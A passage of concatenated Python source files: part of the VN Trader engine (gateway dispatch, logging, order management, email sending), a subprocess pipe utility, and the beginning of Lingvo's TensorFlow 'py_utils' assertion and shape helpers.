Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str) -> "BaseEngine":
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str) -> Optional[Dict[str, Any]]:
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self) -> List[str]:
"""
        Get all names of gateways added in main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self) -> List[BaseApp]:
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self) -> List[Exchange]:
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str) -> None:
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str) -> None:
"""
Subscribe tick data update of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
# def subscribe_kline(self, req: HistoryRequest, gateway_name: str) -> None:
# gateway = self.get_gateway(gateway_name)
# if gateway:
# gateway.subscribe_kline(req)
def send_order(self, req: OrderRequest, gateway_name: str) -> str:
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str) -> None:
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str) -> List[str]:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str) -> None:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_market_trade(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]:
"""
        Send market trade query request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_market_trade(req)
else:
return None
def query_history(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]:
"""
        Send query history request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
return None
def query_account_trade(self, req: AccountTradeRequest, gateway_name: str):
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_account_trade(req=req)
else:
return None
def query_account(self, gateway_name: str):
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_account()
else:
return None
def query_balance(self, req: BalanceRequest, gateway_name: str):
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_balance(req=req)
else:
return None
def close(self) -> None:
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
    Abstract class for implementing a function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
    Processes log events and outputs them with the logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level: int = SETTINGS["log.level"]
self.logger: Logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self) -> None:
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self) -> None:
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self) -> None:
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event) -> None:
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks: Dict[str, TickData] = {}
self.orders: Dict[str, OrderData] = {}
self.trades: Dict[str, TradeData] = {}
self.positions: Dict[str, PositionData] = {}
self.accounts: Dict[str, AccountData] = {}
self.contracts: Dict[str, ContractData] = {}
self.active_orders: Dict[str, OrderData] = {}
self.add_function()
self.register_event()
def add_function(self) -> None:
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event) -> None:
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event) -> None:
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
        # Otherwise, pop inactive order from dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event) -> None:
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event) -> None:
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event) -> None:
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event) -> None:
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol: str) -> Optional[TickData]:
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid: str) -> Optional[OrderData]:
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid: str) -> Optional[TradeData]:
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid: str) -> Optional[PositionData]:
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid: str) -> Optional[AccountData]:
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol: str) -> Optional[ContractData]:
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self) -> List[TickData]:
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self) -> List[OrderData]:
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self) -> List[TradeData]:
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self) -> List[PositionData]:
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self) -> List[AccountData]:
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self) -> List[ContractData]:
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = "") -> List[OrderData]:
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread: Thread = Thread(target=self.run)
self.queue: Queue = Queue()
self.active: bool = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = "") -> None:
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = receiver
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self) -> None:
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self) -> None:
""""""
self.active = True
self.thread.start()
def close(self) -> None:
""""""
if not self.active:
return
self.active = False
self.thread.join()
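# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module, for reference
# only): a minimal way to bring MainEngine up and tear it down. Gateway and
# app classes are project-specific, so the add_gateway()/add_app() calls are
# shown only as commented, hypothetical examples.
if __name__ == "__main__":
    main_engine = MainEngine()  # creates and starts its own EventEngine
    # main_engine.add_gateway(SomeGateway)  # hypothetical gateway class
    # main_engine.add_app(SomeApp)          # hypothetical app class
    main_engine.write_log("MainEngine started.")
    main_engine.close()  # stops the event engine, function engines and gateways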
|
process.py
|
"""
Utility class for spawning and controlling CLI processes.
See: http://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
"""
from __future__ import print_function
import sys, time
from subprocess import PIPE, Popen
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
class Process(object):
"""
Process encapsulates a subprocess with queued stderr/stdout pipes.
Wraps most methods from subprocess.Popen.
For non-blocking reads, use proc.stdout.get_nowait() or
proc.stdout.get(timeout=0.1).
"""
def __init__(self, exec_args, cwd=None):
self.proc = Popen(exec_args, stdout=PIPE, stdin=PIPE, stderr=PIPE,
bufsize=1, close_fds=ON_POSIX, universal_newlines=True,
cwd=cwd)
self.stdin = self.proc.stdin
#self.stdin = PipePrinter(self.proc.stdin)
self.stdout = PipeQueue(self.proc.stdout)
self.stderr = PipeQueue(self.proc.stderr)
for method in ['poll', 'wait', 'send_signal', 'kill', 'terminate']:
setattr(self, method, getattr(self.proc, method))
class PipePrinter(object):
""" For debugging writes to a pipe.
"""
def __init__(self, pipe):
self._pipe = pipe
def __getattr__(self, attr):
return getattr(self._pipe, attr)
def write(self, strn):
print ("WRITE:" + repr(strn))
return self._pipe.write(strn)
class PipeQueue(Queue):
"""
    Queue that starts a background thread to monitor a PIPE for new data.
This is needed to allow non-blocking pipe reads.
"""
def __init__(self, pipe):
Queue.__init__(self)
self.thread = Thread(target=self.enqueue_output, args=(pipe, self))
self.thread.daemon = True # thread dies with the program
self.thread.start()
@staticmethod
def enqueue_output(out, queue):
        # The pipe is opened in text mode (universal_newlines=True), so
        # readline() returns str; use '' (not b'') as the EOF sentinel.
        for line in iter(out.readline, ''):
queue.put(line)
#print "READ: " + repr(line)
out.close()
def read(self):
"""
Read all available lines from the queue, concatenated into a single string.
"""
out = ""
while True:
try:
out += self.get_nowait()
except Empty:
break
return out
def readline(self, timeout=None):
""" Read a single line from the queue.
"""
# we break this up into multiple short reads to allow keyboard
# interrupts
start = time.time()
ret = ""
while True:
if timeout is not None:
remaining = start + timeout - time.time()
if remaining <= 0:
return ""
else:
remaining = 1
try:
return self.get(timeout=min(0.1, remaining))
except Empty:
pass
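# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module, for reference
# only): spawn a short-lived python child process and poll its stdout without
# blocking. The child command is arbitrary demo code.
if __name__ == "__main__":
    proc = Process([sys.executable, '-u', '-c', "print('hello from child')"])
    # readline() polls the queue in <=0.1 s slices, so Ctrl-C stays responsive
    # and an empty string is returned if nothing arrives within the timeout.
    line = proc.stdout.readline(timeout=5)
    print("child said:", repr(line))
    proc.wait()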
|
py_utils.py
|
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common utilities."""
# ==============================================================================
# Note: Avoid adding dependencies to py_utils beyond standard python packages
# and tensorflow.
# ==============================================================================
import collections as py_collections
import contextlib
import functools
import hashlib
import inspect
import math
import numbers
import os
import pkgutil
import re
import threading
import traceback
import lingvo.compat as tf
from lingvo.core import cluster_factory
from lingvo.core import gshard_utils
from lingvo.core import hyperparams
from lingvo.core import nested_map
from lingvo.core import ops
from lingvo.core import py_utils_flags
from lingvo.core import retry
from lingvo.core import symbolic
from lingvo.core import thread_local_utils
from lingvo.core import tshape
import numpy as np
import six
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import function
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import stateless_random_ops
from tensorflow.python.tf2 import enabled as tf2_enabled
from tensorflow.python.tpu import topology as tf_topology
from tensorflow.python.tpu import tpu_function
from tensorflow.python.util import deprecation
# pylint: enable=g-direct-tensorflow-import
FLAGS = tf.flags.FLAGS
# pylint: disable=protected-access
_FromGlobal = py_utils_flags._FromGlobal
# pylint: enable=protected-access
use_xla = py_utils_flags.use_xla
use_tpu = py_utils_flags.use_tpu
testonly_skip_norm_layers = py_utils_flags.testonly_skip_norm_layers
tpu_compat = py_utils_flags.tpu_compat
use_stateless_vars_init = py_utils_flags.use_stateless_vars_init
ENQUEUE_OPS = '__lingvo_enqueue_ops'
# pylint: disable=protected-access
deprecation._PRINT_DEPRECATION_WARNINGS = False
# pylint: enable=protected-access
ThreadLocalStack = thread_local_utils.ThreadLocalStack
ThreadLocalDict = thread_local_utils.ThreadLocalDict
NestedMap = nested_map.NestedMap
def Assert(condition, data, *args, **kwargs):
if py_utils_flags.enable_asserts():
return tf.Assert(condition, data, *args, **kwargs)
else:
return tf.no_op()
def assert_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.debugging.assert_greater_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_greater(*args, **kwargs)
else:
return tf.no_op()
def assert_less_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.debugging.assert_less_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_less(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_less(*args, **kwargs)
else:
return tf.no_op()
def assert_between(x, l, r, *args, **kwargs): # pylint: disable=invalid-name
x = tf.convert_to_tensor(x)
l = tf.cast(tf.convert_to_tensor(l), x.dtype)
r = tf.cast(tf.convert_to_tensor(r), x.dtype)
return tf.group([
assert_greater_equal(x, l, *args, **kwargs),
assert_less(x, r, *args, **kwargs)
])
def assert_shape_match(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
kwargs['msg'] = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(
r'.*/', '', filepath), line, func)
return ops.assert_shape_match(*args, **kwargs)
else:
return tf.no_op()
def assert_same_dim0(xs, *args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return ops.assert_same_dim0(xs, *args, **kwargs)
else:
return tf.no_op()
def assert_even_divide(denorm, num): # pylint: disable=invalid-name
"""Asserts that denorm is evenly divided by num."""
denorm = tf.convert_to_tensor(denorm)
num = tf.convert_to_tensor(num)
if denorm.dtype not in (tf.int32, tf.int64):
    raise ValueError('denominator.dtype is not tf.int32 or tf.int64.')
if num.dtype not in (tf.int32, tf.int64):
raise ValueError('numerator.dtype is not tf.int32 or tf.int64.')
num = HasShape(num, GetShape(denorm))
quo = denorm // num
return assert_equal(quo * num, denorm)
def AssertIdShape(expected_ids_shape_pattern, ids_shape, *args):
"""Asserts shape expected_ids_shape_pattern matches all other input shapes."""
def AssertFn(inputs):
dependencies = [
assert_shape_match(inputs.ids_shape, inputs.expected_ids_shape_pattern)
] + [
assert_shape_match(inputs.ids_shape, x_shape) for x_shape in inputs.args
]
return with_dependencies(dependencies, inputs.ids_shape)
inputs = NestedMap(
expected_ids_shape_pattern=expected_ids_shape_pattern,
ids_shape=ids_shape,
args=args)
return CallDefun(AssertFn, Transform(tf.convert_to_tensor, inputs))
def _CheckNumerics(x, message=None, *args, **kwargs):
if x.dtype.is_floating:
x_name = x.name if not tf.executing_eagerly() else '[eager]'
if 'name' not in kwargs:
kwargs['name'] = re.sub(r':\d+', '', x_name) + '_CheckNumerics'
return tf.debugging.check_numerics(x, message if message else x_name, *args,
**kwargs)
else:
return x
def CheckNumerics(inp, message=None, *args, **kwargs):
"""Check numerics for tensors in inp."""
if not py_utils_flags.enable_check_numerics():
return inp
if isinstance(inp, list):
return [_CheckNumerics(x, message, *args, **kwargs) for x in inp]
if isinstance(inp, tuple):
return tuple(_CheckNumerics(x, message, *args, **kwargs) for x in inp)
return _CheckNumerics(inp, message, *args, **kwargs)
def with_dependencies(dependencies, output_tensor): # pylint: disable=invalid-name
with tf.control_dependencies(dependencies):
return tf.identity(output_tensor)
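# Illustrative sketch (editor-added example, not part of the library API): the
# usual pattern is to attach an assertion as a control dependency so it runs
# whenever the guarded tensor is evaluated. The helper name is hypothetical.
def _ExampleWithDependencies(logits, labels):
  """Returns `logits`, guarded by a rank-compatibility assertion on `labels`."""
  check = assert_equal(tf.rank(logits) - 1, tf.rank(labels))
  return with_dependencies([check], logits)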
def _VarInCollection(var, collection):
"""Return whether a variable `var` is in the given variable collection."""
# We use variable reference for comparison, since variable is not hashable in
# eager mode.
return var.ref() in [v.ref() for v in collection]
@contextlib.contextmanager
def _PrintOptions(*args, **kwargs):
original = np.get_printoptions()
np.set_printoptions(*args, **kwargs)
try:
yield
finally:
np.set_printoptions(**original)
def _Print(name, x):
with _PrintOptions(linewidth=1000):
tf.logging.info('%s = %s', name, np.array_repr(x))
def Log(value, prefix, **kwargs):
"""Prints out values of tensors.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Log(z, 'debug compute()', x=x, y=y)
Args:
    value: A Tensor. Logging happens after this tensor is computed.
    prefix: Every tensor is logged with this prefix.
    **kwargs: keywords and tensors. Tensors are logged in the sorted order of
      these keywords.
Returns:
value is returned.
"""
# Ensures tensors are printed in order.
last = value
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Print, [prefix + ' : ' + k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def Debug(tensor, message='', enabled=True, summarize=100, more=None):
"""Wrapper around tf.Print() and tf.logging.info() to simplify debug printing.
x = py_utils.Debug(x)
When the graph is built a regular log info line will be printed:
-DBG- py_utils_test.py:429 x=Tensor(...
Then when the tensor node is evaluated it will print lines like:
-DBG- py_utils_test.py:429 x Const:0[x.shape=][2 2][x=][[1 2][3 4]]
WARNING: The code that parses local variable names can fail. E.g. don't write
two Debug() calls on one line or a Debug() call that spans more than one line.
Args:
tensor: A tensor to print.
message: A message to print.
    enabled: Whether debug printing is enabled.
summarize: Integer with number of tensor values to print.
more: An optional list of additional tensors.
Returns:
The tensor.
"""
if not enabled or _FromGlobal('disable_py_utils_debug'):
return tensor
if more is None:
more = []
stack = inspect.stack()[1][0]
caller = inspect.getframeinfo(stack)
caller_var = ''
caller_more_vars = []
if caller.code_context:
# Rough and likely to fail. But better than nothing.
match = re.compile(r'Debug\((.*?)(\)|,).*$').search(caller.code_context[0])
if match:
caller_var = match.groups()[0]
if more:
more_vars = re.compile(r'more=\[(.*?)\].*$').search(
caller.code_context[0]).groups()[0]
caller_more_vars = more_vars.split(',')
the_class = ''
if 'self' in stack.f_locals:
the_class = stack.f_locals['self'].__class__.__name__
header = '-DBG- {}:{}:{}:{} {} '.format(
os.path.basename(caller.filename), the_class, caller.function,
caller.lineno, message)
info = '{}{}={}'.format(header, caller_var, tensor)
for name, val in zip(caller_more_vars, more):
info += ' {}={}'.format(name.strip(), val)
tf.logging.info(info)
if isinstance(tensor, tf.Tensor):
tensors = []
tensors += [tf.constant('{}.shape='.format(caller_var)), tf.shape(tensor)]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}.shape='.format(name.strip())), tf.shape(val)]
tensors += [tf.constant('{}='.format(caller_var)), tensor]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}='.format(name.strip())), val]
name = tensor.name if not tf.executing_eagerly() else '[eager]'
info = '{}{} {}'.format(header, caller_var, name)
return tf.identity(
tf.Print(tensor, tensors, info, summarize=summarize),
re.sub(':.*$', '', name))
return tensor
def _Save(steps, prefix, key, val):
filename = '%s.%08d.%s.npy' % (six.ensure_text(prefix), steps,
six.ensure_text(key))
with tf.io.gfile.GFile(filename, 'w') as outfile:
np.save(outfile, val)
def Save(value, filename_prefix, **kwargs):
"""Saves values of tensors into files.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Save(z, '/path/tmp', x=x, y=y, z=z)
Args:
value: A Tensor. Saving happens after this tensor is computed.
filename_prefix: Every tensor is saved with this filename prefix.
    **kwargs: keywords and tensors. Tensors are saved in the sorted order of
      these keywords.
Returns:
value is returned.
"""
last = value
steps = GetGlobalStep()
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Save, [steps, filename_prefix, k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def HasRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has the expected rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims == expected_rank, (
'Ranks did not match, got %d, '
'expected %d') % (tensor.shape.ndims, expected_rank)
return tensor
if py_utils_flags.enable_asserts():
return with_dependencies([tf.assert_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def HasAtLeastRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has rank >= expected_rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims >= expected_rank, (
        'Rank of tensor %d is less than the expected minimum rank %d.') % (
tensor.shape.ndims, expected_rank)
return tensor
if py_utils_flags.enable_asserts():
return with_dependencies(
[tf.debugging.assert_greater_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def GetRank(tensor):
"""Returns tensor's rank as an int if it's available, otherwise a Tensor.
Args:
tensor: The input tensor.
Returns:
Either an int or a Tensor for the rank of the input tensor.
"""
if tensor.shape.ndims is not None:
return tensor.shape.ndims # int
else:
return tf.rank(tensor) # Tensor
def GetShape(tensor, ndims=None):
"""Returns tensor's shape as a list which can be unpacked, unlike tf.shape.
Tries to return static shape if it's available. Note that this means
some of the outputs will be ints while the rest will be Tensors.
Args:
tensor: The input tensor.
ndims: If not None, returns the shapes for the first `ndims` dimensions.
"""
tensor = tf.convert_to_tensor(tensor)
dynamic_shape = tf.shape(tensor)
# Early exit for unranked tensor.
if tensor.shape.ndims is None:
if ndims is None:
return dynamic_shape
else:
return [dynamic_shape[x] for x in range(ndims)]
# Ranked tensor.
if ndims is None:
ndims = tensor.shape.ndims
else:
ndims = min(ndims, tensor.shape.ndims)
# Return mixture of static and dynamic dims.
static_shape = tensor.shape.as_list()
shapes = [
static_shape[x] if static_shape[x] is not None else dynamic_shape[x]
for x in range(ndims)
]
return shapes
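# Illustrative sketch (editor-added example): GetShape() returns Python ints
# for statically known dimensions and scalar Tensors for unknown ones, so its
# result can be unpacked and mixed freely in shape arithmetic. The helper name
# is hypothetical.
def _ExampleGetShapeUsage(x):
  """Merges the trailing two dims of a rank-3 tensor using GetShape()."""
  b, t, d = GetShape(x, 3)  # Each of b, t, d is an int or a scalar Tensor.
  return tf.reshape(x, [b, t * d])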
def HasShape(tensor, expected_shape, ndims=None):
"""Syntactic sugar for asserting that tensor has the expected shape.
Args:
tensor: A Tensor.
expected_shape: A Python list or a 1D tensor. Elements of expected_shape can
be -1 which indicate that any size is valid for that dimension.
ndims: If not None, check only the first `ndims` dimensions of `tensor`.
Must be equal to the length of `expected_shape` if not None.
Returns:
The input `tensor` with control dependencies that will raise a runtime
error if dynamic shape checks fail.
Raises:
ValueError: A value error if the assertion fails at static shape checks.
"""
if not py_utils_flags.enable_asserts():
return tensor
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
msg = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(r'.*/', '',
filepath), line, func)
tensor_shape = GetShape(tensor)
if ndims is not None:
tensor_shape = tensor_shape[:ndims]
# TODO(jngiam): Attempt to switch back to tf.Assert after it has better
# support on GPUs.
assert_op = ops.assert_shape_match(tensor_shape, expected_shape, msg=msg)
# If expected_shape is a Tensor, then we are unable to perform static checks.
# In this case, we can do a dynamic check and return.
if isinstance(expected_shape, tf.Tensor):
return with_dependencies([assert_op], tensor)
# Infer ranks from the inputs.
expected_rank = len(expected_shape)
if isinstance(tensor_shape, tf.Tensor):
tensor_rank = tensor.shape.ndims
else:
tensor_rank = len(tensor_shape)
# If ndims is None, then either one of the ranks should not be None, or they
# should both match. If both ranks are None, then they are both tensors and
# should be caught by the earlier short-circuit.
if ndims is None:
if (tensor_rank is not None) and (expected_rank != tensor_rank):
raise ValueError('Tensor does not match rank of expected shape.\n'
'Tensor shape: {} Expected shape: {}'.format(
tensor_shape, expected_shape))
# Both tensors can be assumed to be of same rank.
ndims = expected_rank
else:
if (tensor_rank is not None) and (tensor_rank < ndims):
raise ValueError('Tensor has fewer dimensions than ndims.\n'
'Tensor shape: {} ndims: {}'.format(tensor_shape, ndims))
if expected_rank != ndims:
raise ValueError(
'Expected shape must have number of dimensions equal to ndims.\n'
'Expected shape: {} ndims: {}'.format(expected_shape, ndims))
# Ensure that both tensor_shape and expected_shape are both lists.
tensor_shape = tensor_shape[:ndims]
if isinstance(tensor_shape, tf.Tensor):
tensor_shape = tf.unstack(tensor_shape, num=ndims)
# Map tf.Dimension values to their held values.
tensor_shape = [
v.value if isinstance(v, tf.Dimension) else v for v in tensor_shape
]
expected_shape = [
v.value if isinstance(v, tf.Dimension) else v for v in expected_shape
]
all_static_checks = True
for idx, (dim, expected_dim) in enumerate(zip(tensor_shape, expected_shape)):
if isinstance(expected_dim, tf.Tensor):
all_static_checks = False
elif expected_dim == -1:
continue
elif isinstance(dim, tf.Tensor):
all_static_checks = False
elif dim != expected_dim:
raise ValueError('Tensor does not match expected shape on dimension {}.\n'
'Tensor shape: {} Expected shape: {}'.format(
idx, tensor_shape, expected_shape))
if all_static_checks:
return tf.convert_to_tensor(tensor)
else:
return with_dependencies([assert_op], tensor)
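# Illustrative sketch (editor-added example): -1 entries in expected_shape act
# as wildcards, so the check below only pins the rank and the last dimension.
# The helper name is hypothetical.
def _ExampleHasShapeUsage(x, dim):
  """Asserts that `x` is rank 2 with last dimension `dim`."""
  return HasShape(x, [-1, dim])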
def HasSameShape(x, ref):
return HasShape(x, GetShape(ref))
def GetSize(tensor):
shape = GetShape(tensor)
if (isinstance(shape, tf.Tensor) or
any([isinstance(x, tf.Tensor) for x in shape])):
return tf.size(tensor)
return np.prod(shape)
def CausalSelfAttenPadding(seqlen, dtype):
"""Wraps tf.linalg.band_part() for tflite compatibility."""
if FLAGS.tflite_compatible:
# [N, 1]
rows = tf.expand_dims(tf.range(seqlen), -1)
# [1, N]
cols = tf.expand_dims(tf.range(seqlen), 0)
row_cols = rows - cols
    return tf.where(row_cols < 0, tf.ones([seqlen, seqlen], dtype),
                    tf.zeros([seqlen, seqlen], dtype))
else:
return 1.0 - tf.linalg.band_part(
tf.ones([seqlen, seqlen], dtype=dtype), -1, 0)
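# Illustrative sketch (editor-added example): for seqlen=3 the padding returned
# by CausalSelfAttenPadding() is
#   [[0, 1, 1],
#    [0, 0, 1],
#    [0, 0, 0]],
# i.e. a 1 marks a future position that causal self-attention must not attend
# to. The helper name is hypothetical.
def _ExampleCausalPadding():
  """Returns the 3x3 causal padding matrix shown above."""
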